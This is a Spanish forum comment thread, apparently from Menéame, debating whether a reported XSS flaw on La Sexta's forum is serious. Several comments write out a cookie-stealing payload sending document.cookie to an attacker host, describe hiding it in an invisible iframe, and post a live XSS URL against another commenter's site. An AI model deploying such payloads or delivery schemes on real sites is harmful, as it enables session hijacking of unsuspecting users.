Portada
mis comunidades
otras secciones
#20:
#18
Solo te voy a citar lo que ha contestado el propio autor del blog:
A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:
document.location=’http://evil.com/index.php?c=’+document.cookie+’;
Para pasar la cookie a un tercero, mediante get.
Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.
Cuanta ignorancia, por dios
Y yo mismo lo he probado, no solo funciona con usuarios no registrados, pero entiendo que el autor no quiera dar muchos detalles, pues no es bueno facilitarle la vida a posibles delincuentes informáticos.
No entiendo por que en cada noticia de seguridad, aparecen los típicos listillos como tu, soltando tonterías a diestro y siniestro, y negándolo siempre y todo. Según vosotros, los bugs solo son válidos cuando se distribuyen con su prueba de concepto válida para idiotas (descargar y ejecutar), que solo consigue causar perdidas a la empresa.
Se nota mucho que no os dedicáis a la seguridad profesionalmente
Y por cierto #18, tu que eres tan experto en seguridad que en tu propia web (sacada de tu perfil propio de meneame)
http://voyager.kwikphp.com/wp-content/plugins/
directory listing con disclossure de tus plugins del wordpress, me acuerdo de a mas de uno han hackeado con eso, y la de veces que han dicho lo peligroso que es eso
Que eso no te parece un bug lo suficientemente serio:
http://voyager.kwikphp.com/index.php?s=%27%22%3E%3Cbody%20onload=%22alert(document.cookie);%22%3E&submit=Buscar
toma xss explotable en tu propia web, eres todo un experto, eh!
Solo te voy a citar lo que ha contestado el propio autor del blog:
A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:
document.location=’http://evil.com/index.php?c=’+document.cookie+’;
Para pasar la cookie a un tercero, mediante get.
Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.
Cuanta ignorancia, por dios
Y yo mismo lo he probado, no solo funciona con usuarios no registrados, pero entiendo que el autor no quiera dar muchos detalles, pues no es bueno facilitarle la vida a posibles delincuentes informáticos.
No entiendo por que en cada noticia de seguridad, aparecen los típicos listillos como tu, soltando tonterías a diestro y siniestro, y negándolo siempre y todo. Según vosotros, los bugs solo son válidos cuando se distribuyen con su prueba de concepto válida para idiotas (descargar y ejecutar), que solo consigue causar perdidas a la empresa.
Se nota mucho que no os dedicáis a la seguridad profesionalmente
Y por cierto #18, tu que eres tan experto en seguridad que en tu propia web (sacada de tu perfil propio de meneame)
http://voyager.kwikphp.com/wp-content/plugins/
directory listing con disclossure de tus plugins del wordpress, me acuerdo de a mas de uno han hackeado con eso, y la de veces que han dicho lo peligroso que es eso
Que eso no te parece un bug lo suficientemente serio:
http://voyager.kwikphp.com/index.php?s=%27%22%3E%3Cbody%20onload=%22alert(document.cookie);%22%3E&submit=Buscar
toma xss explotable en tu propia web, eres todo un experto, eh!
#24:
#21
Lo primero tu dices:
Esa es una copia para que los aprendices de hacker jueguen ser hacker
No creeras que voy a poner la original..
Es la excusa mas pobre que he leído en todo el tiempo que llevo dedicándome profesionalmente a la seguridad, creeme, es la peor. La gente suele decir cosas como: "Es que no es la página definitiva" o cosas así, pero tu excusa no hay por donde cogerla.
Lo segundo, tu dices:
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay
Lo que demuestras con eso, es una completa ignorancia en el campo de desarollo web, como sabrá cualquiera que no lea y programe webs.
Si le robas la cookie local a un usuario, le robas la única pieza de información que mantiene vivo el contexto de sesión, por lo cual, al utilizarla, automáticamente utilizas su sesión con sus privilegios, pero vaya, que todo esto está documentado en wikipedia, por si quieres aprender un poco mas sobre XSS.
Los XSS, son según securityfocus el agujero mas peligroso en relación abundancia-riesgo, pero entiendo que tu has venido hasta aquí, al meneame, a contradecir lo que dicen los principales expertos del mundo.
Lo siento, pero me saca de mis casillas la gente como tu.
Lo primero tu dices:
Esa es una copia para que los aprendices de hacker jueguen ser hacker
No creeras que voy a poner la original..
Es la excusa mas pobre que he leído en todo el tiempo que llevo dedicándome profesionalmente a la seguridad, creeme, es la peor. La gente suele decir cosas como: "Es que no es la página definitiva" o cosas así, pero tu excusa no hay por donde cogerla.
Lo segundo, tu dices:
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay
Lo que demuestras con eso, es una completa ignorancia en el campo de desarollo web, como sabrá cualquiera que no lea y programe webs.
Si le robas la cookie local a un usuario, le robas la única pieza de información que mantiene vivo el contexto de sesión, por lo cual, al utilizarla, automáticamente utilizas su sesión con sus privilegios, pero vaya, que todo esto está documentado en wikipedia, por si quieres aprender un poco mas sobre XSS.
Los XSS, son según securityfocus el agujero mas peligroso en relación abundancia-riesgo, pero entiendo que tu has venido hasta aquí, al meneame, a contradecir lo que dicen los principales expertos del mundo.
Lo siento, pero me saca de mis casillas la gente como tu.
#31:
#27 no se que imagen tienes de mi, de rooibo, o de ninguna de las personas que se dedican a esto profesionalmente, pero desde luego, no te van a robar ninguna cuenta, ni a ti ni a nadie, eso puedes tenerlo claro.
Explotar estos agujeros es un delito tipificado en la ley española, no se si estás al tanto.
Y es un delito, que de denunciar, denunciaría la sexta, y no tu, por lo que nadie va a caer en el juego de explotar este agujero solo para demostrarte nada, estas cosas requieren un uso responsable, y ni mucho menos, nadie se va a poner a hacer ataques contra la sexta por un flame en el meneame, eso sería muy infantil.
Explotar estos agujeros es un delito tipificado en la ley española, no se si estás al tanto.
Y es un delito, que de denunciar, denunciaría la sexta, y no tu, por lo que nadie va a caer en el juego de explotar este agujero solo para demostrarte nada, estas cosas requieren un uso responsable, y ni mucho menos, nadie se va a poner a hacer ataques contra la sexta por un flame en el meneame, eso sería muy infantil.
#26:
#23 y #25 a ver... lo voy a explicar para aclarar un poco, pese a que rooibo no ha querido dar mas detalles, entiendo que la gente no va a creer que hay un bug, sin darles mas información.
Si existe una posibilidad, de controlar código javascript que entra por los argumentos, como es el caso, para leer la cookie del usuario, en el contexto de su sesión (su cookie local, vaya), se puede crear una petición en lugar de:
alert(document.cookie);
pues:
document.location='http://paginadelatacante.com/insertarcookie.php?cookie='+document.cookie;
y todo el enlace, con el xss, y ese código inyectado en el, meterlo en un iframe de 0x0 (invisible) en una web que controlemos, ya solo nos falta que la gente entre a nuestra web (una web normal), para que el iframe ejecute la petición, se produzca el XSS y con ello, la redirección, pasando la cookie a la web del atacante, insertarcookie.php podría ir insertando todas las cookies que recibe en una base de datos, para que luego el atacante, las pudiese utilizar. Y todo ello, sin que se vea nada ni el usuario haga nada, mas que visitar una web, que podría divulgarse entre los usuarios de dicha web, como se ha hecho en el pasado con bugs similares.
Y creo que ya se han dado demasiado detalles
Si existe una posibilidad, de controlar código javascript que entra por los argumentos, como es el caso, para leer la cookie del usuario, en el contexto de su sesión (su cookie local, vaya), se puede crear una petición en lugar de:
alert(document.cookie);
pues:
document.location='http://paginadelatacante.com/insertarcookie.php?cookie='+document.cookie;
y todo el enlace, con el xss, y ese código inyectado en el, meterlo en un iframe de 0x0 (invisible) en una web que controlemos, ya solo nos falta que la gente entre a nuestra web (una web normal), para que el iframe ejecute la petición, se produzca el XSS y con ello, la redirección, pasando la cookie a la web del atacante, insertarcookie.php podría ir insertando todas las cookies que recibe en una base de datos, para que luego el atacante, las pudiese utilizar. Y todo ello, sin que se vea nada ni el usuario haga nada, mas que visitar una web, que podría divulgarse entre los usuarios de dicha web, como se ha hecho en el pasado con bugs similares.
Y creo que ya se han dado demasiado detalles
#41:
#39 me parece increible que aún no entiendas como funciona un XSS, después de mi comentario en #26, que por ejemplo #35 y #40 han comprendido perfectamente.
No lo voy a re-explicar por enésima vez, te recomiendo que leas:
http://en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios
Donde aclaran todo esto a la perfección.
Ah, espera, que en wikipedia también son unos fantasmas?
No lo voy a re-explicar por enésima vez, te recomiendo que leas:
http://en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios
Donde aclaran todo esto a la perfección.
Ah, espera, que en wikipedia también son unos fantasmas?
#42:
#39: ¿Pero que dices, flipao? ¿Modificar el server? 
Culturízate un poco, si vas de sobrao, sin tener ni idea del tema, quedas fatal:
http://en.wikipedia.org/wiki/Cross-site_scripting
Culturízate un poco, si vas de sobrao, sin tener ni idea del tema, quedas fatal:
http://en.wikipedia.org/wiki/Cross-site_scripting
#76:
#73 Creo que hasta yo lo he entendido. A ver si te lo explico en mis términos de hijnorante de la hinformática y lo entiendes:
El malo se hace una web: www.lasextaeslahostia.com
El malo mete en esa web un iframe (que yo ni sabía lo que era) que lleva un código que empieza por "document.location="
El malo se pasa por los foros de la sexta, Pilar Rubio, Patricia Conde y Buenafuente y le dice a la gente que visto una web que es la leche de buena.
El pardillo entra en la web www.lasextaeslahostia.com y se activa el código del iframe, que manda las cookies del pardillo (las que tiene en su ordenador para entrar en www.lasexta.com) a la web del malo.
El malo tiene el user + pass del pardillo.
Si me he equivocado, es culpa vuestra que no hay quien os entienda.
P.D: #20 No sé qué has puesto en ese enlace que se me ha encendido el Firefox+script como nunca.
El malo se hace una web: www.lasextaeslahostia.com
El malo mete en esa web un iframe (que yo ni sabía lo que era) que lleva un código que empieza por "document.location="
El malo se pasa por los foros de la sexta, Pilar Rubio, Patricia Conde y Buenafuente y le dice a la gente que visto una web que es la leche de buena.
El pardillo entra en la web www.lasextaeslahostia.com y se activa el código del iframe, que manda las cookies del pardillo (las que tiene en su ordenador para entrar en www.lasexta.com) a la web del malo.
El malo tiene el user + pass del pardillo.
Si me he equivocado, es culpa vuestra que no hay quien os entienda.
P.D: #20 No sé qué has puesto en ese enlace que se me ha encendido el Firefox+script como nunca.
#5:
No va a salir ahora el follonero riendose de la sexta? vaya pobreticos.
#55:
#47 ¿pero qué rebatir Voyager? Te están diciendo que 2+2=4 y tú le estás diciendo que si no te hacen una demostración de que 2+2=4 no te lo crees. Es tan sencillo lo que te explican y tan absurdo la demostración que pides que no es necesario hacer nada.
Bastaría con que siguieras un enlace para que tu cookie saliera de tu equipo y fuera a terminar a un servidor QUE NO ES el de la sexta. Tan fácil como eso. Una vez sucedido, el dueño del servidor para el que se haya programado el "exploit" tiene acceso a tu cookie y por tanto a tu sesión.
Repite conmigo: 2+2=4.
Bastaría con que siguieras un enlace para que tu cookie saliera de tu equipo y fuera a terminar a un servidor QUE NO ES el de la sexta. Tan fácil como eso. Una vez sucedido, el dueño del servidor para el que se haya programado el "exploit" tiene acceso a tu cookie y por tanto a tu sesión.
Repite conmigo: 2+2=4.
Comentarios
¡Zas! ¡Con su propia medicina!
Que suerte tengo de usar NoScript
NoScript es una extensión de Firefox que bloquea los ataques XSS, como este.
http://noscript.net/
No es la primera vulnerabilidad gorda que les pillan: Simpático "hackeo" a la web oficial de Sé Lo Que Hicisteis
Simpático "hackeo" a la web oficial de S...
slqh.blogspot.comComo soy fricky lo digo yo primero ... OWNED!
Que se jodan, mas pirata que falsificar la wikipedia hay pocas cosas.
No va a salir ahora el follonero riendose de la sexta? vaya pobreticos.
#1 refiriéndonos a La Sexta sería más adecuada la expresión:
¡ZAS! ¡En toda la boca!
¡ZAS! ¡En toda la boca!
Me acuerdo de aquella MVP de Microsoft. A ella le afectaría el problema
No hay peor cosa que la fanfarronería...
No hace gracia reírse de uno mismo?
¿está en el medio del 6 no?
Por cierto, si alguien quiere tambien bajarse directamente los .mp4 de misexta.tv sin utilizar el reproductor que es bastante coñazo tambien es muy facil y no porque no ponen el enlace directamente ellos.
Pero una vez que tienes las rutas le cambias fecha y trozo y ya está, supongo que la mayoria ya lo sabreis sino preguntadme. Pero con un sniffer del TCP poniendo el reproductor y despues buscando entre lo logueado .mp4 ya lo tienes.
[c&p] "...ellos lo que quieren es ser los únicos con el poder de redactar lo que la gente lee..."
+1.
Bua, si contara la de cosas que se pueden hacer con tal agujero... Atish, hachazo!
#11 Otro método:
http://www.gatovolador.kroaton.net/2008/07/20/descargar-videos-de-internet-2-la-web-de-la-sexta.html
No querías zas, pues toma dos en toda la boca. Que les den...
#13 En la wikipedia lo pone
Yo he leído agujero y La sexta, y solo pude pensar en Pilar Rubio
Follonero se mete con la Iglesia: Que guapo tio
, es la leche este follonero...
Follonero la lía con la wikipedia: Menudo cabrón mascachapas...
Cuando el tema nos toca de cerca, cambia mucho la cosa...
No existe esa vulnerabilidad, solo funcionaria con usuarios no registrados...
Para quedar bien y colarsela a los que no saben, esta bien, pero es poco serio...
#17 Iglesia: Curas pederastas, cinismo, corrupción, están forrados de pasta y hablan del hambre en el tercer mundo...
Wikipedia: Información gratuita al alcance de quien tenga internet, posibilidad de compartir conocimientos editándola...
Si, cambia mucho la cosa...
#18
Solo te voy a citar lo que ha contestado el propio autor del blog:
A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:
document.location=’http://evil.com/index.php?c=’+document.cookie+’;
Para pasar la cookie a un tercero, mediante get.
Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.
Cuanta ignorancia, por dios
Y yo mismo lo he probado, no solo funciona con usuarios no registrados, pero entiendo que el autor no quiera dar muchos detalles, pues no es bueno facilitarle la vida a posibles delincuentes informáticos.
No entiendo por que en cada noticia de seguridad, aparecen los típicos listillos como tu, soltando tonterías a diestro y siniestro, y negándolo siempre y todo. Según vosotros, los bugs solo son válidos cuando se distribuyen con su prueba de concepto válida para idiotas (descargar y ejecutar), que solo consigue causar perdidas a la empresa.
Se nota mucho que no os dedicáis a la seguridad profesionalmente
Y por cierto #18, tu que eres tan experto en seguridad que en tu propia web (sacada de tu perfil propio de meneame)
http://voyager.kwikphp.com/wp-content/plugins/
directory listing con disclossure de tus plugins del wordpress, me acuerdo de a mas de uno han hackeado con eso, y la de veces que han dicho lo peligroso que es eso
Que eso no te parece un bug lo suficientemente serio:
http://voyager.kwikphp.com/index.php?s=%27%22%3E%3Cbody%20onload=%22alert(document.cookie);%22%3E&submit=Buscar
toma xss explotable en tu propia web, eres todo un experto, eh!
#20 Esa es una copia para que los aprendices de hacker jueguen ser hacker
No creeras que voy a poner la original..
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay
Si te molesta que te llame aprendiz por haber descubierto ese pseudobug, chico aprende un poco antes de postear en meneame
Por cierto, viendo el comentario del blog :
http://rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta/#comment-3
Felicidades chaval, you're retarded, te has llevado el premio "tontolculo del día"
Uhm, tengo el javascript un poco dejado y no me he puesto a hacer muchas pruebas, pero juraría que este comentario tiene razón: http://rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta/#comment-3
Vamos, que yo sepa document.cookie muestra la cookie de uno mismo siempre... No devuelve nada que haya guardado en el servidor, y menos lo de otro usuario, asi que no acabo de ver que gana con eso...
Aparte es que se puede ver con su propio ejemplo. Si eso realmente devolviera una cookie de un usuario, entonces si se mete un usuario que no existe no debería devolver nada. Ain embargo su ejemplo con el usuario "lol" que no está registrado (al menos en este momento)., si que muestra una cookie, la nuestra propia.
Edito:
#19 Acabo de leer tu comentario, ahora veo por donde va. Sorry por repetirme
#21
Lo primero tu dices:
Esa es una copia para que los aprendices de hacker jueguen ser hacker
No creeras que voy a poner la original..
Es la excusa mas pobre que he leído en todo el tiempo que llevo dedicándome profesionalmente a la seguridad, creeme, es la peor. La gente suele decir cosas como: "Es que no es la página definitiva" o cosas así, pero tu excusa no hay por donde cogerla.
Lo segundo, tu dices:
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay
Lo que demuestras con eso, es una completa ignorancia en el campo de desarollo web, como sabrá cualquiera que no lea y programe webs.
Si le robas la cookie local a un usuario, le robas la única pieza de información que mantiene vivo el contexto de sesión, por lo cual, al utilizarla, automáticamente utilizas su sesión con sus privilegios, pero vaya, que todo esto está documentado en wikipedia, por si quieres aprender un poco mas sobre XSS.
Los XSS, son según securityfocus el agujero mas peligroso en relación abundancia-riesgo, pero entiendo que tu has venido hasta aquí, al meneame, a contradecir lo que dicen los principales expertos del mundo.
Lo siento, pero me saca de mis casillas la gente como tu.
#23 yo creo que efectivamente, si la cookie la coges con javascript siempre será la tuya, ya que javascript se ejecuta de siempre en el lado del cliente (sin excepciones!). Sinceramente, no sabría que hacer con ese "bug", salvo quizás algún XSS que aunque no sean nocivos si dan mala imagen.
#23 y #25 a ver... lo voy a explicar para aclarar un poco, pese a que rooibo no ha querido dar mas detalles, entiendo que la gente no va a creer que hay un bug, sin darles mas información.
Si existe una posibilidad, de controlar código javascript que entra por los argumentos, como es el caso, para leer la cookie del usuario, en el contexto de su sesión (su cookie local, vaya), se puede crear una petición en lugar de:
alert(document.cookie);
pues:
document.location='http://paginadelatacante.com/insertarcookie.php?cookie='+document.cookie;
y todo el enlace, con el xss, y ese código inyectado en el, meterlo en un iframe de 0x0 (invisible) en una web que controlemos, ya solo nos falta que la gente entre a nuestra web (una web normal), para que el iframe ejecute la petición, se produzca el XSS y con ello, la redirección, pasando la cookie a la web del atacante, insertarcookie.php podría ir insertando todas las cookies que recibe en una base de datos, para que luego el atacante, las pudiese utilizar. Y todo ello, sin que se vea nada ni el usuario haga nada, mas que visitar una web, que podría divulgarse entre los usuarios de dicha web, como se ha hecho en el pasado con bugs similares.
Y creo que ya se han dado demasiado detalles
A ver... dejate de teorias... (dile al autor) que me he creado un usuario con el nick Voyager, en la comunidad de la Sexta...
Si se loggea como yo y pone un post, me habrá convencido.
Si no, deduciré que es solo una fantasmada...
hace?
#21 Voyager ? jajaja Que hace usted por aquí?
#24: las paginas personales no se ponen en dominios free como kwikphp
No es una excusa... es una pagina de pruebas
#28: Feagul, buscando fantasmas... ya sabes lo tokapelotas que suelo ser...
#27 no se que imagen tienes de mi, de rooibo, o de ninguna de las personas que se dedican a esto profesionalmente, pero desde luego, no te van a robar ninguna cuenta, ni a ti ni a nadie, eso puedes tenerlo claro.
Explotar estos agujeros es un delito tipificado en la ley española, no se si estás al tanto.
Y es un delito, que de denunciar, denunciaría la sexta, y no tu, por lo que nadie va a caer en el juego de explotar este agujero solo para demostrarte nada, estas cosas requieren un uso responsable, y ni mucho menos, nadie se va a poner a hacer ataques contra la sexta por un flame en el meneame, eso sería muy infantil.
#27 leer tu comentario me ha recordado a las antigüas charlas de irc en canales de "informatica" que decian "solo me creo que sepas algo si me hackeaaas, te doy mi ip? la quieres? va va va a ver que h4x0r eres!!"
resulta un comentario un tanto infantil e hipócrita por tu parte.
Ah, respecto a lo de los fantasmas, has probado a mirarte en un espejo?
#30 Por eso tienes esa mierda de karma
#24 Doy fe que esa no es la web de este hombre. Le conozco de varios foros.
Aún así Voyager ni yo mismo me creería la escusa que diste. En meneame tienes más posibilidades de ser creído si dices que eres un HOYGAN borracho
Yo no tengo idea de javascript ni estas cosas, por eso no puedo saber exactamente si hay algo mal o no. Pero he de decir que cualquier fallo o vulnerabilidad en las páginas de laSexta no me extraña un pelo. Si supierais cómo se hacen...
#26 Ok gracias, ya lo he terminado de entender.
Es que estaba volviendo a dudar, ya que me quede pensando que ejecutar la instruccion que lee la cookie lo puede hacer sin necesidad de usar ninguna pagina externa, pero no me daba cuenta que asi solo consigue la cookie del dominio de la web que usamos y no la de la web con la vulnerabilidad ^_^U
No sé por qué el autor ha eliminado un comentario que calificaba la vulnerabilidad de poco importante basándose en esta lista de Secunia: http://secunia.com/about_secunia_advisories/
El comentario de Albert va con más mala uva y lo ha dejado, en fin...
#35 exacto, en eso reside todo lo que rodea a los bugs XSS
#32
> (...) que decian "solo me creo que sepas algo si me hackeaaas, te doy mi ip? la quieres? va va va a ver que h4x0r eres!!"
Mucho mejor los que decían "Soy un jaker peligroso y si me das tu IP te juankeo", y le confesabas que tu IP es la 127.80.13.28...
A Voyager (#27 y demás), si una fuente no-fiable ejecuta javascript en tu máquina te ha own3ado, así de sencillo... y, como prueba de concepto, ¿quierer ir a meatspin o prefieres un bucle infinito?
#31:
A ver... si solo quieres convencer a newbies, no te preocupes... pero para INYECTAR código, necesitas modificar en el SERVIDOR atacado, el codigo para que la gente al loggearse te envie sus cookies... toda tu argumentacion se cae por sí sola, en el momento que no ejecutas código en el servidor atacado, sólo en el tu navegador... y como mucho en tu servidor atacante... pero NUNCA en el servidor atacado.
Lo que me demuestra que no estoy equivocado, es que te has salido por peteneras ante mi reto de loggearte en lasexta con mi nick...
Aqui no hay XSS desde el momento en que eso no es una vulnerabilidad XSS
#26 entendido, así si! gracias
@Voyager, no creo que si supieras a que se dedica@jcarlosn, te atrevieras a comentar como en #30
#39 me parece increible que aún no entiendas como funciona un XSS, después de mi comentario en #26, que por ejemplo #35 y #40 han comprendido perfectamente.
No lo voy a re-explicar por enésima vez, te recomiendo que leas:
http://en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios
Donde aclaran todo esto a la perfección.
Ah, espera, que en wikipedia también son unos fantasmas?
#39: ¿Pero que dices, flipao? ¿Modificar el server?
Culturízate un poco, si vas de sobrao, sin tener ni idea del tema, quedas fatal:
http://en.wikipedia.org/wiki/Cross-site_scripting
#40 A que se dedica? Ya estoy intrigado! Es de la mafia o algo así?
#39 el que entraría en el servidor, sería el usuario que entra en la web con iframe -> la cookie sería la del usuario que entra en la web del iframe.
No estamos hablando de un ataque SQL injection, ni BSQL injection... de todas formas, aunque veas que la gente está equivocada, lo mínimo que deberías de hacer es explicarlo y guardar las formas (cosa esta última que se te da muy mal).
#43 me dedico a acostarme con r0uzic
Voyager ponte a estudiar y pásate de nuevo por aquí cuando termines la ESO. Has demostrado que estos asuntos te quedan grandes.
#43 Feagul: Es un juanker... parece mentira... no ves lo alterados que se ponen cuando alguien les rebate?
#45 Y por eso el otro usuario no puede comentarte algo? EDITO: Ahora has puesto el modo irónico eh pillin?
#45 Desde cuando?!
#48 claro, cuando te acuestas con r0uzic, automáticamente obtienes protección de algo que llaman "la mafia de meneame" y te sube el karma a 200.
#50 Eres maquinista o último vagón? Lo digo por que por ahí hay una noticia de un homosexual censurado en los juegos!
#51 yo no he hablado de sexo, solo dormimos en la misma cama, nada mas!
Tienes la mirada sucia
Bueno volviendo al tema que tratábamos... Soy el único que cuando ha leído "Agujero en la sexta" ha pensado en Pilar Rubio?
EDITO: #52 también la mente. La culpa es de los Bloggers que las "suben" como putas
Cuantas tonterías juntas se pueden llegar a leer. Creo que ya es suficiente. No alimentar a los trolls ¿no?
#47 ¿pero qué rebatir Voyager? Te están diciendo que 2+2=4 y tú le estás diciendo que si no te hacen una demostración de que 2+2=4 no te lo crees. Es tan sencillo lo que te explican y tan absurdo la demostración que pides que no es necesario hacer nada.
Bastaría con que siguieras un enlace para que tu cookie saliera de tu equipo y fuera a terminar a un servidor QUE NO ES el de la sexta. Tan fácil como eso. Una vez sucedido, el dueño del servidor para el que se haya programado el "exploit" tiene acceso a tu cookie y por tanto a tu sesión.
Repite conmigo: 2+2=4.
#54 goto #16
Vale, psk. nos vamos entendiendo... pero porque voy a seguir un enlace? Donde pones ese enlace o lo publicas aqui en meneame? Si no pincho el enlace no hay cross-site scripting...
por cierto, 2+2 son 100
#57 lo podría haber puesto rooibo en un iframe invisible de su noticia, la cual has leído, ergo, has seguido su enlace, por lo cual, ya tendría tu cookie de la sexta.
DON'T FEED THE TROLL
Si alguien tiene curiosidad: http://es.php.net/manual/es/book.session.php
Pues ves? si en lugar de ponerse en plan "juanker" a pavonearse, me dice que lo pone en su blog, en un iframe, ya nos podriamos haber puesto de acuerdo.
Ahora viene a donde yo quiero ir.
Como obligas a TODOS los users a ir a leer la noticia a tu blog? Con iman positronico?
#61 y por que a todos? basta con enviarlo a meneame, digg, o a foros/comentarios etc de la sexta o los medios que esa web disponga, para que caigan unos cientos.
Y ya no voy a seguir, lo siento.
DON'T FEED THE TROLL
Vale, y una vez que caigan unos cientos... (2-3 diria yo)
Que sentido tiene entrar en unforo de la sexta que NADIE conoce?
Estais comparando vandalizar la Wikipedia, con entrar en un foro que ni DIos sabe que existe?
#63 Reconoce ya tu error y no te empecines, que una retirada digna a tiempo es una victoria, hombre...
Voyager, asi de risas, para ya. Que cansino eres hijo, por dios.
helmer: Que error... si me dice que sólo puede conseguir las cookies de los usuarios que hayan visto esta noticia en menéame.
Y el resto? Si el admin nunca se pasa por aqui, nunca podremos suplantarle?
Ejercicio para avispados: comparen http://www.securitybydefault.com/2008/08/tica.html con la URL del articulo aquí referenciado. Luego cotejen fechas
#67 en tu enlace hablan de un bug de antena3, y rooibo habla de un bug en la sexta.
No veo relación.
Mismo tipo de bug, misma linea argumental de no revelacion, misma motivacion (wikipedia). Lo unico que cambia es la-sexta por a3. IMHO
#17, ¿acaso es malo ser crítico? Alucino.
Owned para Voyager: dejalo tio, que ya has quedado bastante mal.
.
Finalizar los mensajes con caritas felices no ayuda
Y es más, me has hecho hasta registrarme tras llevar ya mucho tiempo siendo anónimo
#17
Meterse con la iglesia -> no perjudica directamente a nadie.
Meterse con la Wikipedia -> no perjudica directamente a nadie.
Vandalizar la Wikipedia -> puede perjudicar a alguien.
Que se meta con la Wikipedia todo lo que quiera, pero que no altere su información.
Que he quedado mal? Dejalo?
A ver si te explico el "problema".
Resulta que la Web tiene una vulnerabilidad XSS "grave" segun el autor del blog. me digo, yo, será un sitio muy visitado, con repercusión, y que será muy fácil hacerle caer en XSS (por ejemplo colgarle un banner). Pero no, consiste en que sólo obtienen las cookies de unos usuarios que quiza ni entren jamás al blog donde esté el iframe con el código que ejecuta la vulnerabilidad...
Recordemos que el titulo prometía que la WEB DE LA SEXTA tenía una vulnerabilidad GRAVE. Todos nos imaginamos que podemos poner una foto de Pilar Rubio en bolas, o vete a saber que... pero no.. la vulnerabilidad sólo afecta a un kutreforo, que nadie visita, y que el "payload" por esta suculenta vulnerabilidad es... oh wait! loggearse como 3 o 4 usuarios perdidos de ese foro que ejecuten el XSS script!
Y esto ha llegado a portada!
Y nada... reirse del descubrimiento del "juanker" sólo provoca que los amigotes del "juanker", por cierto, el autor del blog escribia lo mismo que el autor del post aqui lo solapen y reconstruyan su denostado ego...
Pues fale... es una GRAN vulnerabilidad... los cimientos de Internet tiemblan sólo de pensar en que la han descubierto.. plas plas, palmaditas en la cabeza... anda, vete a buscar otra vulnerabilidad
en fin...
#73 me reitero, en términos de seguridad, eres un ignorante.
los hay mayores: agosto y los becarios!!!
#73 Creo que hasta yo lo he entendido. A ver si te lo explico en mis términos de hijnorante de la hinformática y lo entiendes:
El malo se hace una web: www.lasextaeslahostia.com
El malo mete en esa web un iframe (que yo ni sabía lo que era) que lleva un código que empieza por "document.location="
El malo se pasa por los foros de la sexta, Pilar Rubio, Patricia Conde y Buenafuente y le dice a la gente que visto una web que es la leche de buena.
El pardillo entra en la web www.lasextaeslahostia.com y se activa el código del iframe, que manda las cookies del pardillo (las que tiene en su ordenador para entrar en www.lasexta.com) a la web del malo.
El malo tiene el user + pass del pardillo.
Si me he equivocado, es culpa vuestra que no hay quien os entienda.
P.D: #20 No sé qué has puesto en ese enlace que se me ha encendido el Firefox+script como nunca.
jcarlosn, DZPM Quien eres? Vienes a por mi? AaAaAaAaAaaaAaa
soy el unico que le suena a chino todo eso de exploit y XSS?
no te acostaras....
#76 Yo lo he entendido perfectamente. El caso es que para mi, aun siendo un agujero de seguridad, solamente sería grave si algun admin de la web de la sexta entrase por ese enlace, en ese caso si que lo consideraria grave.
Es decir, como fallo de seguridad, en concepto, es grave, pero a la hora de la verdad, dudo que un admin competente entre a ese enlace.
Pero ahi ya entra lo que cada uno considere grave, si la posibilidad, o el riesgo real. Y por eso se ha montado todo este pollo.
El "agujero de seguridad" lo tienen algunos que trabajan en la sexta
Algo asi ya dije yo en su dia:
programa-follonero-sexta-vandaliza-wikipedia-para-bromas/2#comment-153
El programa El Follonero de La Sexta vandaliza la ...
es.wikipedia.org#78, la posibilidad de robar una cuenta de usuario es grave. Existe la ley de protección de datos.
#74 Y tu un prepotente.
No es un fallo de seguridad GRAVE, en todo caso un fallo de seguridad en la escala de Secunia "Less Critical (2 of 5)"
Debido a que ese foro no lo conoce ni Dios, quien va a querer entrar el el foro de la Sexta habiendo MILLONES de foros mejores y dudo que alguien que lo visite se registre y te mande sus cookies, ya que es abierto a visitantes...
para lo que hay que ver ahi quien se va a registrar...
Un poco de humildad, que te crees Dios... dime de que presumes...
Y me da igual que tu o tus neonicks o palmeros me voten negativo... si me pusiera a hacer lo mismo que vosotros estaria a vuestro nivel.
Un poco de madurez, chavales...
Creo entender lo que dice Voyager. Se refiere a que no se puede decir en el titular que el fallo es grave, porque no afecta al dominio principal de la sexta.
Vamos, que el follonero si se entera, no va a entender que puede repercutir este fallo contra el gran fallo de modificar la wiki.
SI al menos hubierais descubierto como modificar la web del follonero
http://www.lasexta.com/programa/salvados/eurocopa/471
pues eso si que sería grave (al menos para él)
#83
Basta con que uses este XSS para obtener la cookie del admin, con eso tendrás acceso de escritura a la web y podrás cambiar la foto del tipo ese por la de un perro haciendo caca. ¿Contento?
Yo flipo como tanta gente "entiende" de seguridad, pero solo cuando pueden ejecutar un exploit... menuda panda de lamers.
#84: ¿Te he insultado yo a ti? Iba a responderte, pero con tu nula educación paso de hacerlo.
